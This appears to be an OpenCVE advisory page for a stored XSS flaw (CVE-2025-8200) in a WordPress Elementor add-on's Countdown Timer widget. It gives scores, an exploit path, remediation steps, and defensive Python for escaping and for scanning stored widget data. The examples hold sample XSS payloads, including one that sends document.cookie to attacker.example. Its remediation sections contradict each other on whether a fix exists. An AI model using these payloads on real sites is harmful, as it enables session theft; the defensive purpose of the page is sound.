Description
The Mega Elements – Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown Timer widget in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2025-09-26
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting (XSS) in plugin pages
Action: Immediate Patch
AI Analysis

Impact

The flaw is in the Mega Elements – Addons for Elementor plugin's Countdown Timer widget, which neither sanitizes the attribute values a user supplies nor escapes them when the widget is rendered (CWE‑79, stored cross‑site scripting). An authenticated user with the contributor role or higher can place arbitrary JavaScript in the widget's settings; the payload is saved with the page's builder data and written back into the HTML unescaped. Whenever a page containing the compromised widget is loaded, the script runs in the visitor's browser within the site's origin, which allows session hijacking, defacement, or unauthorized content manipulation. The impact scales with who views the page: an administrator previewing or viewing it exposes their authenticated session to the script.
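As an added illustration (not code from the plugin or from this advisory), the following Python models the CWE‑79 pattern the paragraph describes: a widget setting emitted into an attribute or text context without escaping, beside the hardened form that applies context‑appropriate escaping the way WordPress's esc_attr() and esc_html() do in PHP. The setting names, markup and payloads are constructed for the example; a small HTML parser then reports which rendering produces an element that would execute script.

```python
"""Added example: unescaped vs. escaped rendering of widget settings.
Python stands in for the PHP of a WordPress widget; the field names
('due_date', 'label'), the markup and the payloads are assumptions made
for this illustration, not the plugin's real code."""
import html
from html.parser import HTMLParser


def render_unescaped(settings: dict) -> str:
    """Vulnerable pattern: user-controlled settings are interpolated
    straight into an attribute context and a text context."""
    return (
        f'<div class="countdown" data-due="{settings["due_date"]}">'
        f'<span class="label">{settings["label"]}</span></div>'
    )


def render_escaped(settings: dict) -> str:
    """Hardened pattern: every value is escaped for the context it lands
    in. html.escape(quote=True) covers &, <, >, " and ', which is what
    WordPress esc_attr()/esc_html() do for attribute and text contexts."""
    due = html.escape(str(settings["due_date"]), quote=True)
    label = html.escape(str(settings["label"]), quote=True)
    return (
        f'<div class="countdown" data-due="{due}">'
        f'<span class="label">{label}</span></div>'
    )


class _TagCollector(HTMLParser):
    """Collects (tag, attributes) pairs the way a browser's parser sees them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def script_bearing_tags(markup: str) -> list:
    """Return the elements that would run script: <script> elements or
    any element carrying an on* event-handler attribute."""
    parser = _TagCollector()
    parser.feed(markup)
    return [
        (tag, attrs)
        for tag, attrs in parser.tags
        if tag == "script" or any(name.startswith("on") for name in attrs)
    ]


# Constructed payloads of the kind a contributor could type into the
# widget's settings: one breaks out of the attribute, one injects an element.
ATTR_PAYLOAD = {
    "due_date": '2030-01-01" onmouseover="alert(document.cookie)',
    "label": "Launch",
}
TEXT_PAYLOAD = {
    "due_date": "2030-01-01",
    "label": "Launch<script>alert(1)</script>",
}

if __name__ == "__main__":
    for name, payload in (("attribute", ATTR_PAYLOAD), ("text", TEXT_PAYLOAD)):
        print(name, "unescaped ->", script_bearing_tags(render_unescaped(payload)))
        print(name, "escaped   ->", script_bearing_tags(render_escaped(payload)))
```

With the attribute payload the unescaped rendering yields a div that carries an `onmouseover` handler, while the escaped rendering keeps the whole string inside the `data-due` value; with the text payload the unescaped rendering yields a real `<script>` element and the escaped one only text. Sanitizing on save is a second layer, but the rendering side must escape regardless, because stored data can also reach the page through other routes.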

Affected Systems

WordPress sites running Mega Elements – Addons for Elementor 1.3.2 or earlier are affected. The attacker does not need the Countdown Timer widget to be in use already: any user who can open a post in the Elementor editor can add the widget and set its attributes. Releases after 1.3.2 (1.3.3 and above) are outside the affected range.

Risk and Exploitability

The CVSS 3.1 base score of 6.4 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) places the issue at Medium severity; the low privilege requirement and the changed scope (the script runs in other users' browsers, not only the attacker's) drive the score. The EPSS estimate below 1% indicates a very low probability of exploitation in the wild at present, and the CVE is not listed in the CISA KEV catalog. Exploitation requires an authenticated account with the contributor role or higher, which an attacker would typically obtain through credential compromise, a registration flow that hands out contributor rights, or social engineering. Based on the data on this page, the straightforward path is: the attacker opens a post they are allowed to edit in the Elementor editor, adds or edits a Countdown Timer widget, places the script payload in one of its attribute settings, and saves. Contributors cannot publish, so the stored payload is first triggered when an editor or administrator previews or reviews the submitted post; once the post is published, it executes for every visitor of that page.

Generated by OpenCVE AI on April 20, 2026 at 21:45 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update Mega Elements – Addons for Elementor to the latest version (1.3.3 or later), which is outside the affected range.
  • If the update cannot be applied promptly, remove existing Countdown Timer widgets from pages and posts, and review any post saved or submitted by a contributor before previewing it from a privileged account.
  • Restrict contributor-level accounts, or review role assignments, to limit who can edit content in the Elementor editor until the plugin is updated; after updating, check existing pages for payloads that were stored before the fix.
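As an added example, not part of this advisory or of the plugin: after updating, or while deciding which posts need review, a site owner can hunt for payloads already stored in widget settings. Elementor keeps each post's builder tree as JSON in the `_elementor_data` post meta; the script below walks that tree and flags widget settings that contain script‑like content. The Countdown Timer widget's widgetType slug is not given on this page, so the filter matches any widgetType containing "countdown" (an assumption; pass an empty filter to scan every widget). The sample document is constructed for the example.

```python
"""Added example: hunt for stored script payloads in Elementor widget
settings. Elementor stores a post's builder tree as JSON in the
`_elementor_data` post meta, a nested list of elements with elType,
settings and child elements. The 'mega-countdown' widgetType and the
setting names in the sample are assumptions for this example."""
import json
import re

# Content that has no business in a countdown-timer setting.
SUSPICIOUS = re.compile(
    r"<\s*script|javascript\s*:|\bon[a-z]+\s*=|<\s*(iframe|svg|img|object|embed)\b",
    re.IGNORECASE,
)


def iter_widgets(elements, path=()):
    """Depth-first walk of an Elementor element tree, yielding
    (path, element) for every node whose elType is 'widget'."""
    for index, element in enumerate(elements):
        here = path + (element.get("id", str(index)),)
        if element.get("elType") == "widget":
            yield here, element
        yield from iter_widgets(element.get("elements") or [], here)


def find_injected_settings(elementor_data: str, widget_filter: str = "countdown") -> list:
    """Return one finding per string setting that matches SUSPICIOUS, in
    widgets whose widgetType contains widget_filter (case-insensitive).
    An empty widget_filter scans every widget in the tree."""
    findings = []
    for path, widget in iter_widgets(json.loads(elementor_data)):
        widget_type = widget.get("widgetType", "")
        if widget_filter.lower() not in widget_type.lower():
            continue
        for key, value in (widget.get("settings") or {}).items():
            if isinstance(value, str) and SUSPICIOUS.search(value):
                findings.append({
                    "path": "/".join(path),
                    "widgetType": widget_type,
                    "setting": key,
                    "value": value,
                })
    return findings


# Constructed `_elementor_data` value: one clean heading, one clean
# countdown widget, and one countdown widget carrying an attribute
# break-out payload in a label setting.
SAMPLE_ELEMENTOR_DATA = json.dumps([
    {"id": "a1", "elType": "section", "settings": {}, "elements": [
        {"id": "b2", "elType": "column", "settings": {}, "elements": [
            {"id": "c3", "elType": "widget", "widgetType": "heading",
             "settings": {"title": "Coming soon <b>2030</b>"}},
            {"id": "d4", "elType": "widget", "widgetType": "mega-countdown",
             "settings": {"due_date": "2030-01-01 00:00", "label_days": "Days"}},
            {"id": "e5", "elType": "widget", "widgetType": "mega-countdown",
             "settings": {"due_date": "2030-01-01 00:00",
                          "label_days": 'Days" onmouseover="fetch(\'https://attacker.example/?c=\'+document.cookie)'}},
        ]},
    ]},
])

if __name__ == "__main__":
    for finding in find_injected_settings(SAMPLE_ELEMENTOR_DATA):
        print(f'{finding["path"]} [{finding["widgetType"]}] {finding["setting"]}: {finding["value"]!r}')
```

To run this against a live site, pull the stored trees with `SELECT post_id, meta_value FROM wp_postmeta WHERE meta_key = '_elementor_data'` (default `wp_` table prefix assumed) and call find_injected_settings on each meta_value; the path in each finding is the chain of Elementor element ids, which is what the editor shows in its navigator. Treat the regex as a triage filter, not proof of absence: anything flagged should be inspected, and an empty result on a post a contributor touched still deserves a look at the raw settings.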


Advisories
Source: EUVD
ID: EUVD-2025-31202
Title: The Mega Elements – Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown Timer widget in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
History

Fri, 26 Sep 2025 20:15:00 +0000

Type: Metrics (ssvc)
Values added: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Fri, 26 Sep 2025 11:45:00 +0000

Type: First Time appeared
Values added: Elementor elementor; Kraftplugins mega Elements; Wordpress wordpress
Type: Vendors & Products
Values added: Elementor elementor; Kraftplugins mega Elements; Wordpress wordpress

Fri, 26 Sep 2025 02:15:00 +0000

Type: Description
Values added: the description text shown at the top of this page
Type: Title
Values added: Mega Elements – Addons for Elementor <= 1.3.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Countdown Timer Widget
Type: Weaknesses
Values added: CWE-79
Type: References
Values added: (none listed)
Type: Metrics (cvssV3_1)
Values added: {'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}


MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T17:13:57.642Z

Reserved: 2025-07-25T16:50:33.418Z

Link: CVE-2025-8200

Vulnrichment

Updated: 2025-09-26T19:23:50.929Z

NVD

Status : Deferred

Published: 2025-09-26T02:15:52.497

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-8200

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-20T22:00:11Z

Weaknesses